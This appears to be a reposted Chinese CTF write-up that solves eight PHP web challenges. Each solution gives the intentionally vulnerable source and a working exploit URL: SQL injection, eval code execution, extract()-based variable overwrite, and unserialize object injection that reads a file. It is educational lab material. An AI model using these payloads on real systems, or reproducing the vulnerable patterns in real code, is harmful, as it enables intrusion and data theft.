<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            
				
            原文地址:http://drops.wooyun.org/papers/660
            
				
      
            
        
            challenge 1
            


            


            php code:
            


            #!php    
#GOAL: get password from admin;
error_reporting(0);
require 'db.inc.php';

function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

$row = mysql_fetch_assoc($result);

echo "Hello ".$row['name']."</br>";
echo "Your password is:".$row['pass']."</br>";

            




            攻略:
            


            在單引號內的mysql注入,核心就是逃脫單引號,要么生成一個(htmlentities了單引號,不太可能),要么...干掉一個。
            


            所以:
            


            http://php4fun.sinaapp.com/c1/index.php?username=admin\&password=%20or%201%23

            


            challenge 2
            


            


            php code:
            


            #!php
#GOAL: gather some phpinfo();

$str=@(string)$_GET['str'];
eval('$str="'.addslashes($str).'";');

            


            攻略:
            


            eval('$str="'.addslashes($str).'";');這段最后成為php代碼 $str="",里雙引號被addslashes,但內容在雙引號內可以${${這里執行代碼}}
            


            所以:
            


            http://phpchallenges2.sinaapp.com/index.php?str=${${phpinfo()}}

            


            challenge 3
            


            


            php code:
            


            #!php
# GOAL: dump the info for the secret id
require 'db.inc.php';

$id = @(float)$_GET['id'];

$secretId = 1;
if($id == $secretId){
    echo 'Invalid id ('.$id.').';
}
else{
    $query = 'SELECT * FROM users WHERE id = \''.$id.'\';';
    $result = mysql_query($query);
    $row = mysql_fetch_assoc($result);

    echo "id: ".$row['id']."</br>";
    echo "name:".$row['name']."</br>";
}

            


            攻略:
            


            主要是利用php和mysql對float數字型支持的精度不同,精度小的會忽略不能支持的位數。
            


            所以:
            


            http://php4fun.sinaapp.com/c3/index.php?id=1.0000000000001

            


            challenge 4
            


            


            php code:
            


            #!php
#GOAL:get password from admin
# $yourInfo=array(
#   'id'    => 1,
#   'name'  => 'admin',
#   'pass'  => 'xxx',
#   'level' => 1
# );
require 'db.inc.php';

$_CONFIG['extraSecure']=true;

//if register globals = on, undo var overwrites
foreach(array('_GET','_POST','_REQUEST','_COOKIE') as $method){
     foreach($$method as $key=>$value){
          unset($$key);
     }
}

$kw = isset($_GET['kw']) ? trim($_GET['kw']) : die('Please enter in a search keyword.');

if($_CONFIG['extraSecure']){
     $kw=preg_replace('#[^a-z0-9_-]#i','',$kw);
}

$query = 'SELECT * FROM messages WHERE message LIKE \'%'.$kw.'%\';';

$result = mysql_query($query);
$row = mysql_fetch_assoc($result);

echo "id: ".$row['id']."</br>";
echo "message: ".$row['message']."</br>";

            


            攻略:
            


            這段$kw在單引號里,看起來只要能使用單引號就行,所以干掉_CONFIG['extraSecure']就ok,剛好前面畫蛇添足的有可利用的變量unset(不然咋通關?),然后就是聯合查詢了。
            


            所以:
            


            http://php4fun.sinaapp.com/c4/index.php?kw='%20and%200%20union%20select%20name,pass%20from%20users%20where%20id=1%23&_CONFIG=aaa

            


            challenge 5
            


            


            php code:
            


            #!php
# GOAL: overwrite password for admin (id=1)
#       Try to login as admin
# $yourInfo=array( //this is your user data in the db
#   'id'    => 8,
#   'name'  => 'jimbo18714',
#   'pass'  => 'MAYBECHANGED',
#   'level' => 1
# );
require 'db.inc.php';

function mres($str) {
    return mysql_real_escape_string($str);
}

$userInfo = @unserialize($_GET['userInfo']);

$query = 'SELECT * FROM users WHERE id = \''.mres($userInfo['id']).'\' AND pass = \''.mres($userInfo['pass']).'\';';

$result = mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

$row = mysql_fetch_assoc($result);
foreach($row as $key => $value){
    $userInfo[$key] = $value;
}

$oldPass = @$_GET['oldPass'];
$newPass = @$_GET['newPass'];
if($oldPass == $userInfo['pass']){
    $userInfo['pass'] = $newPass;
    $query = 'UPDATE users SET pass = \''.mres($newPass).'\' WHERE id = \''.mres($userInfo['id']).'\';';
    mysql_query($query);
    echo 'Password Changed.';
}
else{
    echo 'Invalid old password entered.';
}

            


            攻略:
            


            (1) http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x03.txt (站上默認顯示的密碼就是個提示...估計是哪位大蝦順手改的) 
(2) $userInfo['pass'] = $newPass; //這句,改成1
            


            所以:
            


            (1) 修改jimbo18714密碼為8 (2) 再次修改密碼,提交時userInfo為8的序列化,newPass為1
            


            challenge 6
            


            


            php code:
            


            #!php
#GOAL: get the secret;

class just4fun {
    var $enter;
    var $secret;
}

if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];

    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }

    $o = unserialize($pass);

    if ($o) {
        $o->secret = "?????????????????????????????";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$o->secret;
        else 
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}

            


            攻略:
            


            serialize一個just4fun的對象,序列化之前先賦值給$o->enter (在本地執行是成功的,php4fun.sinaapp.com不行,代碼改了?)
            


            所以:
            


            (1) 生成序列化的對象
            


            #!php
class just4fun {
    var $enter;
    var $secret;
}

$a=new just4fun();
$a->enter='?????????????????????????????';
echo urlencode(serialize($a));

            


            (2)
            


            link?pass=O%3A8%3A%22just4fun%22%3A2%3A%7Bs%3A5%3A%22enter%22%3Bs%3A29%3A%22%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%3F%22%3Bs%3A6%3A%22secret%22%3BN%3B%7D

            


            challenge 7
            


            


            php code:
            


            #!php
# GOAL: get the key from $hidden_password[207]

session_start();
error_reporting(0);

function auth($password, $hidden_password) {
    $res = 0;
    if(isset($password) && $password != "") {
        if($password == $hidden_password) {
            $res = 1;
        }
    }
    $_SESSION["logged"] = $res;
    return $res;
}

function display($res){
    $aff = htmlentities($res);
    return $aff;
}


if(!isset($_SESSION["logged"]))
    $_SESSION["logged"] = 0;

$aff = "";
include("config.inc.php");

foreach($_REQUEST as $request) {
    if(is_array($request)) {
        die("Can not use Array in request!");
    }
}

$password = $_POST["password"];

if(!ini_get("register_globals")) {
    $superglobals = array($_POST, $_GET);
    if(isset($_SESSION)) {
        array_unshift($superglobals, $_SESSION);
    }
    foreach($superglobals as $superglobal) {
        extract($superglobal, 0);
    }
}

if((isset($password) && $password != "" && auth($password, $hidden_password[207]) == 1) || (is_array($_SESSION) && $_SESSION["logged"] == 1)) {
    $aff = display("$hidden_password[207]");
} else {
    $aff = display("Try again");
}
echo $aff;

            


            攻略:
            


            get the key from $hidden_password[207] 這句有點模糊,下面的‘所以’可以得到key(繞過REQUEST對數組的判斷)
            


            所以:
            


            http://php4fun.sinaapp.com/c7/index.php?_SESSION[logged]=1
POST: _SESSION=1

            


            challenge 8
            


            


            php code:
            


            #!php
#GOAL: file_get_content('sbztz.php')    : )

    class just4fun {
        public $filename;

        function __toString() {
            return @file_get_contents($this->filename);
        }
    }

    $data = stripslashes($_GET['data']);
    if (!$data) {
        die("hello from y");
    }

    $token = $data[0];
    $pass = true; 

    switch ( $token ) {
        case 'a' :
        case 'O' :
        case 'b' :
        case 'i' :
        case 'd' :
            $pass = ! (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
            break;

        default:
            $pass = false;

    }

    if (!$pass) {
      die("TKS L.N.");
    }

    echo unserialize($data); 

            


            攻略:
            


            http://drops.wooyun.org/papers/596
            


            http://zone.wooyun.org/content/6697
            


            所以:
            


            (1) 生成利用的data:
            


            O%3A%2B8%3A"just4fun"%3A1%3A%7Bs%3A8%3A"filename"%3Bs%3A9%3A"sbztz.php"%3B%7D  (注意%2B)

            


            (2)
            


            http://php4fun.sinaapp.com/c8/index.php?data=O%3A%2B8%3A"just4fun"%3A1%3A%7Bs%3A8%3A"filename"%3Bs%3A9%3A"sbztz.php"%3B%7D

                  
            
    
			

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>
            

            <span id="7ztzv"></span><form id="7ztzv"></form>
            

            <span id="7ztzv"></span>
              

                

                  <address id="7ztzv"></address>
                      

亚洲欧美在线